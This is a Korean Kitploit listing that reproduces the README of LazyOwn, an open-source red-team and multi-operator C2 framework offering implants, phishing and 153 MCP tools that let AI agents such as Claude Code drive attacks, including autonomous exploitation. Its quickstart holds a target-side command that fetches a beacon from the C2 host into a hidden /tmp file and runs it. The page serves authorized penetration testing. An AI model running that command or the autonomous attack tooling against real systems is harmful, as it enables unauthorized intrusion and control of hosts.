Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
LazyOwn — 레드팀 프레임워크이자 다중 운영자 C2 플랫폼으로, AI 에이전트, 가변형 임플란트, 루트킷, 피싱 엔진, 그리고 전체 공격 킬 체인을 아우르는 741개의 CLI 명령을 갖추고 있습니다. | Kitploit
도구/GitHubGitHub/grisuno/lazyown
Penetration Testing FrameworksVulnerability ScannersExploit FrameworksPost-ExploitationPhishingPenetration TestingCommand and ControlRed TeamingPayload DevelopmentRemote Access TrojanAI Security
228451322시간 1분 전Kitploit 검토 완료
GitHubgrisuno/lazyown

LazyOwn

레드팀 프레임워크이자 다중 운영자 C2 플랫폼으로, AI 에이전트, 가변형 임플란트, 루트킷, 피싱 엔진, 그리고 전체 공격 킬 체인을 아우르는 741개의 CLI 명령을 갖추고 있습니다.

저장소 보기웹사이트

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

LazyOwn — AI 에이전트를 갖춘 RedTeam 프레임워크, Linux BOF 비콘, YARA+Nuclei 마켓플레이스

LazyOwn_Redteam_framework

stars release docker ci License: GPL v3 Ask DeepWiki

741개의 CLI 명령. 멀티 오퍼레이터 C2. AI 에이전트를 위한 153개의 MCP 도구. Linux BOF 지원 + 내장 YARA/Nuclei 마켓플레이스를 갖춘 유일한 OSS C2.

60초 만에 체험 (설치 불필요)골든 패스 (모든 인게이지먼트)원 커맨드 자동 침투
docker run -it ghcr.io/grisuno/lazyown:latestping > lazynmap > auto_populate > facts_show > recommend_nextengage 10.10.11.5

golden path demo C2 collab demo MCP AI demo

더 많은 데모

첫 7개 명령정찰 루프
first stepsrecon loop
CLI에서의 C2비콘에 명령 전달
C2 CLIissue to C2

전체 워크스루: QUICKSTART.md (5분) · 80/20 가이드: ESSENTIALS.md · HTB 엔드투엔드: docs/examples/htb-lame-walkthrough.md · 솔직한 비교: COMPARISON.md

LazyOwn vs Sliver / Havoc / Mythic / Caldera / Metasploit

기능LazyOwnSliverHavocMythicCalderaMetasploit
Linux BOF 지원yesnonononono
YARA + Nuclei 마켓플레이스 내장yesnonononono
AI 에이전트용 MCP 서버 (153개 도구)yesnonononono
LLM 오퍼레이터 + 멀티 에이전트 하이브yesnonononono
멀티 오퍼레이터 C2 + 피싱 엔진yespartialpartialpartialpartialpartial

전체 표: COMPARISON.md. 오류를 발견하셨나요? 이슈를 열어주세요, 저희가 수정합니다.```sh ██▓ ▄▄▄ ▒███████▒▓██ ██▓ ▒█████ █ █░███▄ █ ▓██▒ ▒████▄ ▒ ▒ ▒ ▄▀░ ▒██ ██▒▒██▒ ██▒▓█░ █ ░█░██ ▀█ █ ▒██░ ▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██ ██░▒██░ ██▒▒█░ █ ░█▓██ ▀█ ██▒ ▒██░ ░██▄▄▄▄██ ▄▀▒ ░ ░ ▐██▓░▒██ ██░░█░ █ ░█▓██▒ ▐▌██▒ ░██████▒▓█ ▓██▒▒███████▒ ░ ██▒▓░░ ████▓▒░░░██▒██▓▒██░ ▓██░ ░ ▒░▓ ░▒▒ ▓▒█░░▒▒ ▓░▒░▒ ██▒▒▒ ░ ▒░▒░▒░ ░ ▓░▒ ▒ ░ ▒░ ▒ ▒ ░ ░ ▒ ░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ▓██ ░▒░ ░ ▒ ▒░ ▒ ░ ░ ░ ░░ ░ ▒░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ▒ ▒ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░

root@kitploit:~
[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y2Z73AV)


LazyOwn은 어떠한 보증도 제공하지 않습니다. 이는 자유 소프트웨어이며, GNU General Public License v3의 조건에 따라 재배포할 수 있습니다.
이 소프트웨어의 사용에 대한 자세한 내용은 LICENSE 파일을 참조하십시오.

 # LazyOwn RedTeam Framework v0.2.161

LazyOwn은 침투 테스터, 레드팀, 보안 연구원을 위해 구축된 전문 레드팀 프레임워크이자 Command & Control (C2) 플랫폼입니다. 741개의 CLI 명령, 126개의 별칭, AI 에이전트를 위한 153개의 MCP 도구, 다중 운영자 웹 C2 대시보드, 그리고 Linux, Windows, macOS, BSD 전반의 전체 킬 체인을 아우르는 137개의 YAML/Lua 플러그인 통합을 제공합니다.

**v0.2.161의 새로운 기능:** YARA 규칙 + Nuclei 템플릿이 포함된 통합 마켓플레이스, `auto_pwn` 자율 익스플로잇, 위협 정보 기반 정찰을 위한 `hunt` 명령, 명령 후 팁 엔진, 자동 세션 데이터 암호화, 게임화된 ELO/배지, 그리고 7개의 새로운 APT 플레이북.

## 세 개의 명령으로 시작하기

처음이신가요? 이것이 전체 진입 경로입니다. 전체 안내: [`QUICKSTART.md`](https://github.com/grisuno/lazyown/blob/main/QUICKSTART.md).```bash
git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn
bash install.sh        # virtualenv + pinned dependencies + C2 certificates
./run                  # launches the shell; first run offers the setup wizard

기본 설치는 가볍게 진행되며, 무거운 torch/CUDA 스택을 위해서는 --with-ml을, 로컬 LLM 런타임을 위해서는 --with-ollama를, 일반적인 외부 바이너리를 위해서는 --with-tools를 추가하세요. 의존성은 requirements.txt(크로스 플랫폼 코어)와 requirements-ml.txt(선택적 ML)에 고정되어 있으며, pyproject.toml이 단일 진실 공급원(single source of truth)입니다.

Docker

격리되고 재현 가능한 작업을 위해서는 lazyown-docker/README.md를 참조하세요.```bash cd lazyown-docker ./mkdocker.sh build ./mkdocker.sh run --vpn 1

root@kitploit:~
그런 다음, `(LazyOwn) >` 셸 안에서:```text
doctor          # preflight: verifies Python, venv, packages, certs, SecLists, tools
wizard          # guided config (auto-detects lhost, walks 8 steps incl. LLM provider)
ping            # confirm the target is up and detect its OS
lazynmap        # full port + service scan

doctor가 차단 실패(빨간색)를 보고하면 더 진행하기 전에 수정하세요 — 누락된 항목에 대해 정확한 pip install / apt install 명령을 알려줍니다. 경고(노란색)는 지금은 무시해도 되는 선택적 기능입니다.

핵심 아키텍처

LazyOwn은 보안 테스트 워크플로에 유연성과 확장성을 제공하는 모듈식 명령 기반 아키텍처를 중심으로 구축되었습니다.

diagrama_lazyown

LazyOwn은 cmd2 기반의 명령줄 인터페이스(CLI)와 Flask 기반의 웹 GUI를 통합합니다. 매개변수는 payload.json에 범위가 지정되어 도구 전반에 걸쳐 일관된 구성을 가능하게 합니다. 이 프레임워크는 적대자 시뮬레이션, cron 명령을 통한 작업 스케줄링, 그리고 지속적인 자동화 위협 시뮬레이션 워크플로를 지원합니다.

image

image

자세한 내용은 CONTRIBUTING.md를 참조하세요.

LazyOwn Skills — MCP 통합

Model Context Protocol(MCP)을 통해 Claude Code를 LazyOwn 프레임워크에 연결합니다. MCP 서버는 전체 참여 수명 주기를 포괄하는 153개의 도구를 노출합니다.

파일

파일용도
skills/lazyown_mcp.pyMCP 서버 — Claude에 153개의 LazyOwn 도구를 노출
skills/lazyown.mdClaude Code 스킬 / 슬래시 명령 문서
skills/autonomous_daemon.py자율 실행 데몬 (목표 기반, 단계 간 Claude 불필요)
skills/hive_mind.pyChromaDB 메모리를 갖춘 다중 에이전트 퀸 + 드론 시스템
skills/lazyown_policy.pyauto_loop용 보상 기반 정책 엔진
skills/lazyown_facts.pynmap XML 및 도구 출력에서 구조화된 사실 추출
skills/lazyown_parquet_db.pyParquet 지식 베이스: 세션 기록, GTFOBins, LOLBas, ATT&CK

빠른 시작 (첫 셸까지 5분)

전체 가이드: QUICKSTART.md```bash

1. Clone and install (light by default; add --with-ml for the 2 GB torch/CUDA stack, --with-ollama for the local LLM)

git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn && bash install.sh

2. Launch, verify the install, then run the wizard

./run (LazyOwn) > doctor # preflight: Python, venv, packages, certs, SecLists, tools (LazyOwn) > wizard # auto-detects lhost, walks 8 config steps incl. LLM provider

Heavy optional dependencies (pycryptodome, python-libnmap, impacket, ...) are

imported lazily: a missing package degrades only its feature instead of

crashing the shell, and the dependent command raises a clear "pip install ..."

error when used. To audit them without launching the shell (works even if rich

or cmd2 are broken): python3 -m core.dependencies

3. Define your authorized scope, then recon

(LazyOwn) > scope add 10.10.11.0/24 && scope mode enforce (LazyOwn) > ping && lazynmap && auto_populate && facts_show

4. Start C2 (separate terminal)

bash fast_run_as_r00t.sh --no-attach --vpn 1

5. Get a shell — Linux BOF-capable beacon

(LazyOwn) > blacksandbeacon

Then on target: curl -sk "http://:/blacksandbeacon" -o /tmp/.svc && chmod +x /tmp/.svc && /tmp/.svc &

6. Invite teammates (multi-operator)

(LazyOwn) > collab_join alice

Prints: https://:<c2_port>/collab/?operator=alice

root@kitploit:~
---

## 다중 운영자 협업

LazyOwn의 협업 레이어는 Server-Sent Events(SSE)를 통해 실시간 팀 서버 기능을 제공합니다. `lazyc2.py`가 시작될 때 자동으로 활성화됩니다.

**브라우저 대시보드** — 팀 내 모든 브라우저에서 열 수 있습니다:```
https://<lhost>:<c2_port>/collab/?operator=<your_handle>

터미널 SSE 스트림:```bash curl --insecure -N "https://:<c2_port>/collab/stream?operator=alice" | jq .

root@kitploit:~
**모든 운영자에게 발견 사항 게시**:```bash
curl --insecure -sk -X POST https://<lhost>:<c2_port>/collab/publish \
  -H "Content-Type: application/json" \
  -d '{"type":"finding","operator":"alice","payload":{"target":"10.10.11.5","detail":"root via CVE-2024-xxxx"}}'

대상 잠금 (두 운영자가 동일한 도구를 실행하는 것을 방지):```bash curl --insecure -sk -X POST https://:<c2_port>/collab/lock
-H "Content-Type: application/json"
-d '{"target":"10.10.11.5","operator":"alice","ttl_secs":300}'

root@kitploit:~
| 엔드포인트 | 메서드 | 설명 |
|---|---|---|
| `/collab/` | GET | 다중 운영자 브라우저 대시보드 |
| `/collab/stream?operator=<name>` | GET (SSE) | 실시간 이벤트 스트림 |
| `/collab/operators` | GET | 활성 운영자 목록 |
| `/collab/publish` | POST | 구조화된 이벤트 브로드캐스트 |
| `/collab/lock` | POST | 권고 대상 잠금 획득 |
| `/collab/unlock` | POST | 대상 잠금 해제 |
| `/collab/locks` | GET | 모든 활성 잠금 |
| `/collab/history?n=100` | GET | 최근 N개 이벤트 |

CLI에서: `collab_join <handle>`은 주어진 운영자에 대한 모든 URL을 출력합니다.

---

## MCP 빠른 시작

LazyOwn은 Model Context Protocol(MCP)을 통해 전체 프레임워크를 노출합니다. 동일한 서버가 Claude Code, Claude Desktop, Hermes Agent, OpenCode와 함께 작동합니다 — 환경에 맞는 통합을 선택하세요.

### Claude Code```bash
bash scripts/setup_hermes_mcp.sh

또는 .mcp.example.json을 .mcp.json으로 복사하고 LAZYOWN_DIR을 이 체크아웃의 절대 경로로 설정하세요:```json { "mcpServers": { "lazyown": { "command": "python3", "args": ["${LAZYOWN_DIR}/skills/lazyown_mcp.py"], "env": { "LAZYOWN_DIR": "${LAZYOWN_DIR}" } } } }

root@kitploit:~
슬래시 명령어 설치(선택 사항):```bash
cp skills/lazyown.md ~/.claude/commands/lazyown.md

Claude Code를 재시작하면 모든 lazyown_* 도구를 사용할 수 있습니다.

Hermes Agent

LazyOwn은 Hermes 네이티브입니다. skills/hermes-lazyown/ 통합 레이어는 체크포인트 재개, 동적 규칙 생성, 네이티브 위임 계획 기능을 갖춘 Hermes 컨텍스트 윈도우에 최적화된 간결한 네임스페이스 도구 표면을 제공합니다.

~/.hermes/config.yaml에 등록하세요:```yaml mcp_servers: hermes-lazyown: command: python3 args: ["${LAZYOWN_DIR}/skills/hermes-lazyown/mcp_server.py"] env: LAZYOWN_DIR: "${LAZYOWN_DIR}"

root@kitploit:~
그런 다음 Hermes에서 `/reload-mcp`로 MCP 도구를 다시 로드하세요.

전체 Hermes 통합 가이드는 `skills/hermes-lazyown/README.md`를 참조하세요.

### OpenCode

LazyOwn은 **LazyOwnOpenCodeAdapter**를 통해 OpenCode 친화적입니다:```bash
git clone https://github.com/grisuno/LazyOwnOpenCodeAdapter.git
cd LazyOwnOpenCodeAdapter && npm install
npm run build

어댑터는 LazyOwn의 MCP 서버를 OpenCode CLI에 연결하여, OpenCode 네이티브 프롬프트와 워크플로우를 통해 동일한 lazyown_* 도구 표면을 노출합니다.

전체 설정: https://github.com/grisuno/LazyOwnOpenCodeAdapter

환경 변수

변수기본값설명
LAZYOWN_DIRskills/의 상위 디렉터리LazyOwn 루트 디렉터리
LAZYOWN_C2_HOSTpayload.json lhostC2 서버 주소
LAZYOWN_C2_PORTpayload.json c2_portC2 서버 포트
LAZYOWN_C2_USERpayload.json c2_userC2 사용자 이름
LAZYOWN_C2_PASSpayload.json c2_passC2 비밀번호

MCP 도구 그룹 (153개 도구)

그룹도구설명
핵심 실행7run_command (이제 dry_run + confirm 지원), get/set_config, list_modules, discover_commands, command_help, palette
감사 및 컨텍스트6target_context, tasks_cleanup, evidence_grep, session_diff, run_command_async, job_status
대상 관리3add_target, list_targets, set_active_target
C2 / 임플란트 제어10c2_command, c2_status, get_beacons, run_api, c2_profile, c2_vuln_analysis, c2_redop, c2_search_agent, c2_script, c2_adversary
세션 인식4session_status, session_state, list_sessions, read_session_file
자율 루프3auto_loop, policy_status, recommend_next
ACI — 자율 캠페인 인텔리전스3aci_plan, aci_status, aci_replan
반응형 인텔리전스2reactive_suggest, bridge_suggest
목표 및 계획4inject_objective, next_objective, soul, read_prompt
지식 베이스9parquet_query/annotate, facts_show, cve_search, searchsploit, rag_index/query, threat_model
메모리 및 학습3memory_recall/store, eval_quality
캠페인 및 보고7campaign, campaign_tasks, generate_report, misp_export, collab_publish, timeline
플레이북2playbook_generate, playbook_run
애드온, 도구 및 플러그인3list_addons/plugins, create_addon/tool
스케줄링2cron_schedule, daemon
AI 에이전트5run_agent, agent_status/result, list_agents, llm_ask
이벤트 엔진4poll_events, ack_event, add_rule, heartbeat_status
SWAN MoE+RL4swan_run, swan_ensemble, swan_status, swan_route

전체 문서: skills/README.md 및 skills/lazyown.md.

감사 모드 MCP 개선 사항

자율 감사를 더 효율적이고 오류 발생 가능성이 낮게 만들기 위해 skills/lazyown_mcp_helpers.py에 추가되었습니다. 로직은 순수 함수 모듈에 위치하여 격리된 상태에서 단위 테스트가 가능합니다 (tests/test_mcp_improvements.py).

도구 / 매개변수수행하는 작업중요한 이유
lazyown_session_init(format='json', include_recommend=true)SITREP를 배너 대신 구조화된 dict로 반환하며, 선택적으로 상위 3개 순위의 권장 작업을 포함합니다.호출당 약 5KB의 장식된 텍스트를 절약하며, 에이전트가 소비하기 전에 필터링할 수 있습니다.
lazyown_campaign_sitrep(format='json')마스터 교대 보고서에 동일한 JSON 옵션을 제공합니다.두 상황 도구 모두에서 일관된 형식을 유지합니다.
lazyown_target_context(host, port=N)하나의 (host, port) 튜플에 대해 열린 포트, 월드 모델 자격 증명(출처 + 신뢰도 포함), 취약점, pwntomate 증거 최신성, nmap 최신성을 집계합니다.대상에 대한 다음 작업을 결정할 때 4-5개의 개별 조회를 대체합니다.
lazyown_tasks_cleanup(dry_run=true, min_confidence=0.5)sessions/tasks.json을 감사하고 포함된 자격 증명이 실제로 타임스탬프 / URL / IP / 중복인 항목을 표시합니다. 파일을 다시 작성하려면 dry_run=false를 전달하세요(먼저 .bak이 작성됩니다).감시자는 흔히 로그 타임스탬프를 "자격 증명"으로 바꾸는데, 실제 캠페인에서는 100개 이상의 노이즈 작업을 제거합니다.
`lazyown_evidence_grep(pattern, scope='alllootnmap
lazyown_run_command(command, dry_run=true)사전 점검: 실행하지 않고 기본 명령, 바이너리 경로, OS 요구 사항 대 현재 OS, 중복될 아티팩트, 누락된 페이로드 키를 반환합니다.30분 스캔의 실수로 인한 반복 실행을 방지하며, Linux 대상에 대해 Windows 전용 도구를 실행 전에 표시합니다.
lazyown_run_command_async(command, timeout) + lazyown_job_status(job_id)긴 명령(lazynmap, pwntomate, auto_loop)을 위한 백그라운드 작업 패턴입니다. 즉시 job_id를 반환합니다.30분 이상 소요된다고 문서화된 명령에서 에이전트가 차단되지 않도록 합니다.
lazyown_session_diff(take=true)마지막 스냅샷 이후 sessions/의 추가 / 수정 / 제거된 파일과 새로운 자격 증명 / 작업 ID를 보고합니다.교대 인계를 명확하게 하며, 모든 새 세션의 첫 번째 호출로 적합합니다.
확인 게이트 (confirm=true)lazyown_c2_command, lazyown_c2_redop, lazyown_c2_adversary, 그리고 본문이 rm -rf / exfil / wipe / encrypt-file과 일치하는 모든 run_command는 이제 명시적인 confirm=true 인수를 요구합니다.자율 루프로 인한 우발적인 파괴적 작업을 방지합니다.
자격 증명의 출처 + 신뢰도target_context를 통해 노출되는 각 자격 증명은 발견 시 is_likely_credential, , , 그리고 블록(, , )을 포함합니다.

감사 모드 CLI 개선 사항

cli/cli_enhancements.py의 SOLID 확장 레이어가 기존 CommandSet 자동 검색 (cli/commands/audit.py)을 통해 cmd2 셸에 연결됩니다. 27k 라인의 lazyown.py 코어는 두 개의 작은 훅(lazy 별칭 로딩, completedefault 폴백) 외에는 수정이 필요하지 않았습니다.

명령 / 훅수행하는 작업기반
fz [query]모든 do_*, 별칭, 플러그인, 애드온에 대한 퍼지 명령 검색기입니다. 정확 일치 > 접두사 > 부분 문자열 > 시퀀스 유사도 순으로 점수를 매깁니다.FuzzyCommandIndex
form <command>플래그가 많은 명령(현재 phishing, venom, evil)에 대해 운영자를 대화형 매개변수 양식으로 안내합니다. 필수 필드와 options 열거형을 검증하며, 비대화형 IO에서는 기본값으로 폴백합니다.InteractiveForm, FormSpec
status_tail [target]최신 sessions/scan_<target>.partial/.nmap을 파싱하여 열린 포트, 완료율, 마지막 줄을 출력하므로 운영자가 셸을 떠나지 않고 긴 스캔을 모니터링할 수 있습니다.LiveStatusTail
grep_log <pattern> [--cmd <name>]실행된 명령과 그 출력의 최근 트랜스크립트에 대한 정규식 검색입니다. 재시작 간에도 유지됩니다(sessions/_cli_transcript.jsonl).TranscriptStore
reload_addonslazyaddons/와 plugins/를 폴링하고 마지막 스윕 이후 변경된 모든 것을 셸을 재시작하지 않고 다시 등록합니다.AddonHotReloader
audit_complete_keys <command> [partial]주어진 명령에 대해 페이로드 인식 완성기가 제안할 내용을 표시합니다. 완성 동작을 검증하는 데 유용합니다.PayloadAwareCompleter
completedefault (Tab)Cmd2 훅이 이제 페이로드 인식 완성기로 폴스루하여 set/assign에 대한 페이로드 키, target에 대한 IP 값, gobuster/ffuf에 대한 워드리스트 키, run에 대한 애드온 이름, plugin에 대한 플러그인 이름, evil/cme/secretsdump에 대한 캡처된 자격 증명을 제안합니다.PayloadAwareCompleter
동적 별칭 해석cli/aliases.py는 이제 기본적으로 lazy=True입니다: 별칭 템플릿은 {rhost}/{lhost}/등의 플레이스홀더를 유지하고 실행 시 self.params에 대해 렌더링됩니다. set rhost X는 다음 키 입력 시 모든 별칭에 전파됩니다(셸 재시작 불필요). 사전 치환은 여전히 로 사용할 수 있습니다.

기본 요소들은 프레임워크에 구애받지 않으며 작은 typing.Protocol 인터페이스(PayloadProvider, CommandLister, TerminalIO)에 의존하므로 격리된 상태에서 단위 테스트가 가능합니다. tests/test_cli_enhancements.py (36개 테스트)를 참조하세요.

퍼지 드롭다운 자동 완성

cmd2 셸은 GNU readline 위에 curses 기반 퍼지 피커를 설치합니다 (cli/fuzzy_picker.py). 두 개 이상의 완성 항목을 사용할 수 있을 때 Tab을 한 번 누르면, 피커가 터미널 하단에 고정된 테두리 있는 드롭다운을 열어 모든 일치 항목을 설명과 함께 표시합니다. 점수 계산기는 부분 문자열 및 유사도보다 정확 일치, 접두사, 부분 시퀀스 일치를 우선시하며(독립 실행형 fz 명령이 사용하는 것과 동일한 순위), 쿼리의 일치하는 문자가 각 행에서 강조 표시되어 운영자가 후보가 목록에 있는 이유를 볼 수 있습니다.

탐색: 이동은 ↑ / ↓, 점프는 Page Up / Page Down, 탐색은 Home / End, 제자리에서 쿼리 편집은 Backspace, 강조 표시된 명령을 프롬프트에 삽입하려면 Tab 또는 Enter, 취소하려면 Esc 또는 Ctrl-C. 후보가 하나만 일치하면 readline의 일반 자동 삽입 동작이 유지되므로 피커가 빠른 운영자를 방해하지 않습니다. 기하 구조, 색상, 글리프는 PickerConfig에 의해 구동되며, payload.json의 선택적 fuzzy_picker 블록이 코드를 건드리지 않고 해당 필드(예: "max_visible_rows": 8)를 재정의할 수 있습니다.

구성 가능한 Neon Box 프롬프트 — config_banner

cmd2 셸은 정규 세그먼트 집합(user_host, iface, lhost, rhost, domain, public_ip, cwd, git, venv, time, kernel, version, battery_load)으로 조립된 3줄 Neon Box 프롬프트를 렌더링합니다. 렌더러는 cli/banner_config.py에 작은 SOLID 스택으로 구현되어 있습니다: 정보 조각당 하나의 SegmentRenderer, SegmentRegistry, BannerSettings 값 객체, 그리고 ANSI 색상 출력을 내보내는 BannerRenderer. 공용 IP, 커널 릴리스, LazyOwn 버전은 TTL 캐시되므로 첫 렌더링 이후 프롬프트가 밀리초 미만으로 유지됩니다.

config_banner 셸 명령은 세 개의 탭 — Segments, Colors, Glyphs — 과 패널 하단에 고정된 결과 프롬프트의 라이브 미리보기를 갖춘 Powerlevel10k 스타일 curses 마법사를 엽니다. Tab / Shift+Tab은 탭을 순환하고, **↑ / ↓**는 활성 탭 내에서 이동하며, Enter는 banner 블록 아래 payload.json에 저장하고, Escape는 취소합니다. 탭별 바인딩:

탭동작 키
SegmentsSpace는 세그먼트를 켜고 끕니다; a는 모든 세그먼트를 활성화합니다; n은 모든 세그먼트를 비활성화합니다; d는 공장 기본값을 복원합니다.
ColorsSpace / →는 다음 명명된 색상(bright_green, bright_cyan, bright_magenta, …)으로 순환합니다; ←는 뒤로 순환합니다; d는 해당 세그먼트의 기본 색상을 복원합니다.
GlyphsSpace / →는 포커스된 슬롯(top_left, vertical, bullet_primary, arrow, prompt_char_user, …)의 다음 문자로 순환합니다; ←는 뒤로 순환합니다; d는 해당 슬롯의 기본 글리프를 복원합니다.

셸 프롬프트는 저장 후 즉시 새로 고쳐집니다 — 재시작이 필요하지 않습니다. TTY가 없는 운영자(CI, 스크립트)는 여전히 config_banner show와 config_banner reset으로 시스템을 구동하거나 페이로드를 직접 편집할 수 있습니다:```json "banner": { "enabled": ["user_host", "iface", "rhost", "domain", "cwd", "git", "venv", "time"], "colors": {"user_host": "bright_green", "rhost": "bright_red", "domain": "bright_yellow"}, "glyphs": {"top_left": "┌", "bottom_left": "└", "horizontal": "─", "vertical": "│", "bullet_primary": "❯", "arrow": "→"} }

root@kitploit:~
색상 이름은 `ColorRegistry`에 대해 검증되고 글리프 문자는
`GlyphRegistry`에 대해 검증됩니다. 알 수 없는 값은 조용히
팩토리 기본값으로 폴백되므로 잘못된 페이로드가 프롬프트를
깨뜨리는 일은 결코 없습니다.

### 그래프 인식 내비게이션 — graphify의 운영자 + 에이전트 UX

`cli/graph_advisor.py`는 LazyOwn 소스 트리에 대해
[`/graphify`](https://graphify.dev)가 생성한 지식 그래프
(`graphify-out/graph_lazyown.json` — 약 1500개 노드, 약 2900개 엣지, 14개
커뮤니티)를 로드하여 cmd2 셸과 MCP 서버 모두에 노출합니다. 이
어드바이저는 단일 파일 SOLID 스택입니다 — `GraphLoader`(mtime 캐시 파일
IO), `GraphIndex`(인메모리 인접성 / 차수 / 커뮤니티 인덱스),
`GraphScorer`(순수 랭킹 프리미티브), `GraphAdvisor`(오케스트레이터) —
모든 상수는 `GraphAdvisorConfig` 데이터클래스에 유지됩니다.

**운영자 명령 (cmd2 셸)**

| 명령 | 목적 |
|---------|---------|
| `graph_search <query> [limit]` | 레이블, id 또는 소스 파일로 노드를 퍼지 검색합니다. |
| `neighbors <node> [depth] [limit]` | 엣지 관계 / 신뢰도와 함께 노드에서 바깥으로 그래프를 순회합니다. |
| `god_nodes [N]` | 가장 많이 연결된 노드 — 프레임워크의 핵심 추상화 — 를 표시합니다. |
| `suggest_next [seeds…] [N]` | 최근 활동에서 바깥으로 순회하여 다음 명령을 추천합니다. 시드가 없으면 `sessions/LazyOwn_session_report.csv`를 읽어 거기서 시드를 가져옵니다. |

셸의 `default()` 훅은 이제 알 수 없는 `do_*` 명령을 동일한 어드바이저 +
기존 `FuzzyCommandIndex`를 통해 처리하므로, `ddo_lazynmap`을 입력한
운영자는 토스트가 뜨기 전에 즉시 *"Did you mean: do_lazynmap, do_lazynmap_quick, …?"*를
보게 됩니다.

**MCP 도구 (Claude Code, Claude web, 모든 MCP 에이전트)**

| 도구 | 목적 |
|------|---------|
| `lazyown_graph_summary` | 노드 / 엣지 / 커뮤니티 개수와 확인된 그래프 경로. |
| `lazyown_graph_search` | `budget_tokens` 상한이 있는 퍼지 노드 검색으로, JSON 응답이 에이전트의 컨텍스트 윈도우를 결코 초과하지 않습니다. |
| `lazyown_graph_neighbors` | 엣지 관계와 신뢰도를 포함한 계층적 인접성 순회 — 정형화된 "X는 무엇에 의존하는가?" 질의. |
| `lazyown_graph_suggest_next` | 다음 단계 추천. 명시적 `recent` 목록을 받거나 세션 트랜스크립트를 읽습니다. |

모든 MCP 그래프 도구는 `budget_tokens`(기본 1500)에 맞추기 위해
리스트 필드를 제자리에서 잘라냅니다. 그래프가 없으면 모든 도구는
크래시하는 대신 `{"available": false, "reason": "..."}`를 반환합니다 —
운영자는 `/graphify .`를 한 번 실행하라는 안내를 받고, 그러면 모든 것이
작동하기 시작합니다.

어드바이저는 `(path, mtime)`으로 캐시하므로, 셸이나 MCP 서버를
재시작하지 않고도 다음 CLI 명령 또는 MCP 호출 시 새로운 `/graphify`
재빌드가 자동으로 반영됩니다. 로더, 인덱스, 스코어러 및 전체 어드바이저
API를 다루는 20개의 단위 테스트는 `tests/test_graph_advisor.py`를
참조하세요.

### 인라인 반응형 힌트 — 비차단 다음 단계 제안

`cli/reactive_hints.py`는 `register_postcmd_hook`을 통해 cmd2
post-command 파이프라인에 연결되어, 다음 프롬프트가 나타나기 전에
모든 명령 출력 아래에 한 줄의 흐린 텍스트를 출력합니다:```
  ↳ do_gobuster · do_enum4linux · do_ffuf

제안은 graphify 지식 그래프(suggest_next에서 사용하는 것과 동일한 GraphAdvisor)에서 나오므로, 일반적인 목록이 아니라 구조적으로 근거를 둔 것입니다. 훅은 완전히 논블로킹입니다. cmd2가 프롬프트를 렌더링하기 전에 반환하므로, 운영자는 즉시 다음 명령을 입력하기 시작할 수 있습니다.

제어

동작방법
세션에 대한 힌트 비활성화set enable_inline_hints false
다시 활성화set enable_inline_hints true
영구적으로 유지set enable_inline_hints false 후 save

건너뛰기 목록에 있는 명령(help, ?, exit, set, show, palette, dashboard, suggest_next, graph_search, neighbors, god_nodes)은 힌트 줄을 생성하지 않습니다. 이들은 제안이 잡음만 더하는 메타 명령입니다.

graphify 그래프가 없으면 훅은 조용히 반환합니다. 그래프를 만들려면 /graphify .를 한 번 실행하면 되고, 그러면 바로 다음 명령부터 힌트가 나타나기 시작합니다.

운영자 TUI 대시보드 — dashboard

cli/dashboard_tui.py는 셸에서 다음과 같이 실행하는 전체 화면 Textual 대시보드입니다:``` dashboard

root@kitploit:~
It blocks the shell while open (like `htop` or `lazygit`). Press **Q** or
Ctrl-C to close and return to the cmd2 prompt.

**Layout**```
┌─ LazyOwn RedTeam Dashboard ─────────────────────────────────────────────────┐
│ TARGET 10.10.11.5  ATTACKER 10.10.14.5  DOMAIN target.htb  PHASE RECON  OS  │
├─────────────────────┬─────────────────────────────────┬─────────────────────┤
│  Kill Chain         │  Recent Commands                │  Ops                │
│  ✔ Recon            │  ● lazynmap        2026-05-11   │  Objective:         │
│  ▶ Enum             │  ● ping            2026-05-11   │  Initial Access     │
│  ○ Exploit          │  ● gobuster        2026-05-11   │                     │
│  ○ PrivEsc          │                                 │  Credentials: 0     │
│  ○ Lateral          │                                 │  Hashes: 0          │
│  ○ Exfil            │  Config                         │  Beacons: 0         │
│  ○ Report           │  Target: 10.10.11.5             │                     │
│                     │  C2 Port: 4444                  │                     │
├─────────────────────┴─────────────────────────────────┴─────────────────────┤
│  ↳ next: do_gobuster · do_enum4linux · do_ffuf · do_nikto                   │
└──────────────────────────────────── [Q] Quit  [R] Refresh  [?] Help ────────┘

데이터 소스 (5초마다 자동 새로고침)

패널소스
Target / phase / OSpayload.json, sessions/world_model.json
킬 체인 진행 상황sessions/world_model.json → completed_phases
최근 명령sessions/LazyOwn_session_report.csv
목표sessions/world_model.json, sessions/tasks.json
자격 증명 / 해시sessions/credentials*.txt, sessions/hash*.txt
비컨sessions/beacons.json
그래프 힌트graphify-out/graph_lazyown.json

pip install textual 필요 (install.sh에 추가됨).

명령 팔레트 및 그래프 인식 탐색

lazyown_palette MCP 도구(또한 palette CLI 명령과 /palette 웹 뷰로 접근 가능하며, 모든 C2 페이지에서 전역 Ctrl+K / Cmd+K 오버레이 제공)를 통해 에이전트와 운영자는 스크롤 없이 422개 이상의 do_* 명령을 탐색할 수 있습니다. 모드:

모드예시설명
개요palette단계별 명령 수.
단계palette recon킬 체인 단계의 모든 명령과 한 줄 요약.
단계 + 필터palette enum nmap자유 텍스트 쿼리로 좁힌 단계 목록.
검색palette --search ldap이름과 요약에 대한 퍼지 검색.
